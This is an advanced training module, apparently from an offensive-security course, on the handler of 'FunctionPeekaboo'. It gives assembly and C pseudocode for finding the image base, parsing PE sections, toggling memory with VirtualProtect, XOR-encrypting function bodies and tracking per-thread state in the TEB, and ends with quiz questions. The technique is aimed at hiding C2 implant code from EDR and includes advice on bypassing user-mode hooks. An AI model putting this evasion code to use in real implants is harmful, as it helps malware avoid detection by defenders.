Difficulty: Advanced

Module 6: The Handler & XOR Engine

The ~380-byte core routine that performs memory permission changes, PE header parsing, and byte-level XOR encryption/decryption.

Module Objective

Deep dive into the handler — the shared routine called by every prologue and epilogue stub. Understand its PE header validation logic, .funcmeta section traversal, VirtualProtect permission transitions (RX → RW → RX), byte-level XOR implementation, and the TEB UserReserved field usage for per-thread state management via the GS segment register.

1. Handler Overview

The handler is a single shared routine (~380 bytes) called by every prologue and epilogue stub. It receives two arguments:

ParameterRegisterDescription
Function PointerRCXPointer to the function body that needs to be encrypted or decrypted
Operation FlagRDX0 = decrypt (called from prologue), 1 = encrypt (called from epilogue)

The handler’s job is to:

Handler Steps

  1. Find the PE image base by walking backward from the handler’s own address to find the MZ header
  2. Parse PE headers to locate the .funcmeta section
  3. Search .funcmeta entries to find the metadata for the target function (matching by RVA)
  4. Check the IsEncrypted flag to determine if the requested operation is valid
  5. Call VirtualProtect to change the function’s memory to RW (writable)
  6. XOR the function body bytes with the stored key
  7. Call VirtualProtect to restore RX (executable) permissions
  8. Update the IsEncrypted flag in .funcmeta
  9. Update TEB UserReserved fields to track the currently active function

2. Finding the Image Base

The handler needs to find the PE image base to locate the section headers. Since ASLR randomizes the load address, the handler uses a backward-scanning technique:

x86-64 Assembly; Find image base by scanning backward from current address
; PE images are aligned to 64KB boundaries (0x10000)
find_image_base:
    ; Start from the handler's own address (known from CALL/POP)
    mov     rax, handler_address
    and     rax, 0xFFFFFFFFFFFF0000  ; Align down to 64KB boundary

.scan_loop:
    ; Check for MZ signature at this address
    cmp     word ptr [rax], 0x5A4D   ; "MZ" in little-endian
    je      .found_mz
    sub     rax, 0x10000             ; Move back 64KB
    jmp     .scan_loop

.found_mz:
    ; RAX = image base
    ; Validate: check PE signature
    mov     ecx, dword ptr [rax + 0x3C]   ; e_lfanew (offset to PE header)
    cmp     dword ptr [rax + rcx], 0x4550  ; "PE\0\0"
    jne     .scan_loop                     ; Not a valid PE, keep scanning
    ; Valid PE found - RAX = ImageBase

Why Not Use GetModuleHandle?

Calling GetModuleHandle(NULL) would be simpler, but it requires importing the function from kernel32.dll. The handler is designed to be import-free where possible, reducing the API footprint visible to EDR. The backward MZ scan is a well-known technique used in shellcode and reflective loaders — it works because the Windows PE loader maps executables at 64KB-aligned boundaries.

3. PE Header Traversal

Once the image base is found, the handler parses the PE headers to locate the .funcmeta section:

x86-64 Assembly; Navigate PE headers to find .funcmeta section
; RAX = ImageBase (from step 2)
parse_pe:
    mov     ecx, [rax + 0x3C]        ; e_lfanew
    lea     rdx, [rax + rcx]          ; RDX = PE signature address
    ; PE signature at [RDX+0]  = "PE\0\0"
    ; COFF header at  [RDX+4]  (20 bytes)
    ; Optional hdr at [RDX+24] (variable size)

    ; Get number of sections
    movzx   ecx, word ptr [rdx + 6]   ; NumberOfSections

    ; Get size of optional header
    movzx   r8d, word ptr [rdx + 20]  ; SizeOfOptionalHeader

    ; First section header starts after optional header
    lea     r9, [rdx + 24 + r8]       ; R9 = first IMAGE_SECTION_HEADER

    ; Iterate section headers (40 bytes each)
.section_loop:
    ; Compare section name with ".funcmeta"
    ; Section name is 8 bytes at [R9+0]
    cmp     dword ptr [r9], 0x6E75662E    ; ".fun" in little-endian
    jne     .next_section
    cmp     dword ptr [r9 + 4], 0x74656D63 ; "cmet" in little-endian
    je      .found_funcmeta

.next_section:
    add     r9, 40                    ; sizeof(IMAGE_SECTION_HEADER)
    dec     ecx
    jnz     .section_loop
    ret                               ; .funcmeta not found (shouldn't happen)

.found_funcmeta:
    ; R9 = pointer to .funcmeta section header
    mov     ecx, [r9 + 12]           ; VirtualAddress (RVA)
    lea     rsi, [rax + rcx]          ; RSI = .funcmeta data in memory

4. .funcmeta Entry Lookup

The .funcmeta section is a flat array of entries. The handler searches for the entry matching the target function (whose address was passed in RCX by the stub):

x86-64 Assembly; Search .funcmeta for the target function
; RSI = .funcmeta data pointer
; RCX = target function body address (from stub)
; RAX = ImageBase
search_funcmeta:
    ; Convert target address to RVA
    sub     rcx, rax                  ; RCX = function RVA

.entry_loop:
    ; Each entry: [4B RVA][4B Size][1B Key][1B IsEncrypted][2B Pad]
    mov     edi, [rsi]                ; Entry's FunctionRVA
    test    edi, edi                  ; NULL terminator?
    jz      .not_found                ; Shouldn't happen for valid calls

    cmp     edi, ecx                  ; Compare with target RVA
    je      .found_entry

    add     rsi, 12                   ; Next entry (12 bytes per entry)
    jmp     .entry_loop

.found_entry:
    ; RSI points to the matching entry
    ; [RSI+0]  = FunctionRVA (DWORD)
    ; [RSI+4]  = FunctionSize (DWORD)
    ; [RSI+8]  = XorKey (BYTE)
    ; [RSI+9]  = IsEncrypted (BYTE)
    ; [RSI+10] = Reserved (WORD)

5. VirtualProtect Permission Changes

Before XOR-ing the function body, the handler must change memory permissions. The function’s .text section is normally PAGE_EXECUTE_READ (RX), which prevents writing. The handler toggles to PAGE_READWRITE (RW) for the XOR operation, then back to PAGE_EXECUTE_READ after:

C (Pseudocode)// Permission change sequence in the handler
void handler(void* func_body, int operation) {
    FUNC_META_ENTRY* entry = find_entry(func_body);
    DWORD oldProtect;

    // Step 1: Change to RW (writable, non-executable)
    VirtualProtect(
        func_body,
        entry->FunctionSize,
        PAGE_READWRITE,         // 0x04
        &oldProtect             // Saves previous protection (PAGE_EXECUTE_READ)
    );

    // Step 2: XOR the function body
    xor_memory(func_body, entry->FunctionSize, entry->XorKey);

    // Step 3: Restore to RX (executable, non-writable)
    VirtualProtect(
        func_body,
        entry->FunctionSize,
        PAGE_EXECUTE_READ,      // 0x20
        &oldProtect
    );

    // Step 4: Update state
    entry->IsEncrypted = !entry->IsEncrypted;
}

VirtualProtect is the Main Detection Surface

VirtualProtect is a well-monitored API. EDR products hook it to detect memory permission changes (a classic indicator of shellcode injection and sleep obfuscation). The per-function granularity of FunctionPeekaboo means many small VirtualProtect calls rather than one large one, which could be either harder or easier to detect depending on the EDR’s heuristics. An advanced implementation might use NtProtectVirtualMemory syscalls directly to bypass user-mode hooks.

6. The XOR Engine

The actual encryption/decryption is a simple byte-level XOR loop. Since XOR is its own inverse, the same operation encrypts and decrypts:

x86-64 Assembly; XOR engine - encrypt or decrypt function body
; RDI = pointer to function body
; ECX = function body size (bytes)
; AL  = XOR key
xor_engine:
    test    ecx, ecx
    jz      .xor_done

.xor_loop:
    xor     byte ptr [rdi], al    ; XOR single byte
    inc     rdi                    ; Next byte
    dec     ecx                    ; Decrement counter
    jnz     .xor_loop

.xor_done:
    ret

This is intentionally simple. The loop processes one byte at a time, which is not the fastest possible implementation but is the smallest and most reliable. Optimization options include:

OptimizationApproachTrade-off
8-byte blocksBroadcast XOR key to 8 bytes, XOR QWORD at a time8x faster, slightly more code, alignment handling needed
SSE/AVXUse PXOR with 16/32/64-byte vectors16-64x faster, much more code, register save overhead
REP STOSB variantUse string operations with XORSimple but no direct REP XOR instruction exists

Why Byte-by-Byte?

Function bodies vary in size and are not guaranteed to be aligned to any particular boundary. A byte-by-byte loop handles all sizes correctly without alignment checks. For typical function sizes (hundreds to low thousands of bytes), the performance difference between byte-by-byte and QWORD XOR is microseconds — negligible compared to the VirtualProtect syscall overhead.

7. TEB UserReserved Fields

The Thread Environment Block (TEB) contains three UserReserved PVOID fields at offsets 0x1478, 0x1480, and 0x1488 (on x86-64 Windows). These fields are reserved for application use — Windows does not use them, making them ideal for per-thread state storage:

x86-64 Assembly; Access TEB via GS segment register (x86-64 Windows)
; GS:[0x30] = pointer to TEB itself (self-reference)
; GS:[0x1478] = UserReserved[0]
; GS:[0x1480] = UserReserved[1]
; GS:[0x1488] = UserReserved[2]

; FunctionPeekaboo uses these for per-thread tracking:
; UserReserved[0] = pointer to currently active (decrypted) function body
; UserReserved[1] = operation flags / recursion counter

; In the handler - update active function tracking:
update_teb:
    ; On decrypt (prologue): store function pointer
    mov     qword ptr gs:[0x1478], rcx    ; Store active function ptr

    ; On encrypt (epilogue): clear active function pointer
    mov     qword ptr gs:[0x1478], 0      ; No function currently active

Why TEB and Not a Global Variable?

A global variable would work for single-threaded implants, but most C2 implants are multithreaded (handling multiple tasks concurrently). The TEB is per-thread, so each thread can independently track which function it is currently executing. This prevents thread A’s function state from interfering with thread B’s function state.

8. GS Segment Register on Windows x64

On x86-64 Windows, the GS segment register points to the TEB for the current thread. The processor swaps GS on context switches, so GS:[offset] always refers to the current thread’s TEB:

GS OffsetTEB FieldPurpose
GS:[0x00]ExceptionListSEH chain
GS:[0x08]StackBaseStack top
GS:[0x10]StackLimitStack bottom
GS:[0x30]SelfTEB self-pointer
GS:[0x48]ProcessIdPID
GS:[0x50]ThreadIdTID
GS:[0x60]ProcessEnvironmentBlockPEB pointer
GS:[0x1478]UserReserved[0]FunctionPeekaboo: active function ptr
GS:[0x1480]UserReserved[1]FunctionPeekaboo: flags
GS:[0x1488]UserReserved[2]FunctionPeekaboo: reserved

GS vs FS

On x86-64 Windows, GS points to the TEB. On x86-32, it was FS. This is a common source of confusion. FunctionPeekaboo targets x86-64 and uses GS exclusively. On Linux, the segment register usage is reversed (FS for TLS on x86-64), but FunctionPeekaboo is Windows-specific.

9. Complete Handler Pseudocode

C (Pseudocode)// Complete handler logic (~380 bytes compiled)
void __fastcall handler(void* func_body_ptr, uint64_t operation) {
    // 1. Find image base (backward MZ scan)
    uintptr_t base = find_image_base();

    // 2. Parse PE headers to find .funcmeta
    IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
    IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
    IMAGE_SECTION_HEADER* sections = IMAGE_FIRST_SECTION(nt);

    FUNC_META_ENTRY* meta = NULL;
    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        if (memcmp(sections[i].Name, ".funcmeta", 8) == 0) {
            meta = (FUNC_META_ENTRY*)(base + sections[i].VirtualAddress);
            break;
        }
    }

    // 3. Find matching entry
    uintptr_t func_rva = (uintptr_t)func_body_ptr - base;
    while (meta->FunctionRVA != 0) {
        if (meta->FunctionRVA == func_rva)
            break;
        meta++;
    }

    // 4. Validate operation
    if (operation == 0 && !meta->IsEncrypted)
        return;  // Already decrypted, skip
    if (operation == 1 && meta->IsEncrypted)
        return;  // Already encrypted, skip

    // 5. Change permissions to RW
    DWORD old;
    VirtualProtect(func_body_ptr, meta->FunctionSize, PAGE_READWRITE, &old);

    // 6. XOR the function body
    uint8_t* bytes = (uint8_t*)func_body_ptr;
    for (DWORD i = 0; i < meta->FunctionSize; i++) {
        bytes[i] ^= meta->XorKey;
    }

    // 7. Restore permissions to RX
    VirtualProtect(func_body_ptr, meta->FunctionSize, PAGE_EXECUTE_READ, &old);

    // 8. Update metadata
    meta->IsEncrypted = !meta->IsEncrypted;

    // 9. Update TEB tracking
    if (operation == 0) {  // decrypt
        __writegsqword(0x1478, (uint64_t)func_body_ptr);
    } else {               // encrypt
        __writegsqword(0x1478, 0);
    }
}

10. Handler as Position-Independent Code

The handler itself must be position-independent. It cannot contain absolute addresses or rely on the import table (since it runs before the CRT initializes imports in some configurations). The only external dependency is VirtualProtect from kernel32.dll, which can be resolved via:

VirtualProtect Resolution Options

The PoC uses the IAT approach for simplicity. A production implementation (like Nighthawk) would likely use direct syscalls.

Knowledge Check

Q1: How does the handler find the PE image base at runtime?

A) It reads the ImageBase field from a global variable
B) It calls GetModuleHandle(NULL)
C) It scans backward from its own address on 64KB boundaries looking for the MZ signature
D) The linker stores it in the .stub section

Q2: Why does FunctionPeekaboo use TEB UserReserved fields instead of global variables?

A) TEB is per-thread, allowing multithreaded implants to track each thread's active function independently
B) Global variables are not supported on Windows
C) TEB fields are encrypted by the OS for security
D) Global variables would be too slow to access

Q3: What is the primary detection surface of the handler?

A) The XOR operation itself
B) VirtualProtect calls to change memory permissions (RX → RW → RX)
C) The TEB field writes
D) The PE header parsing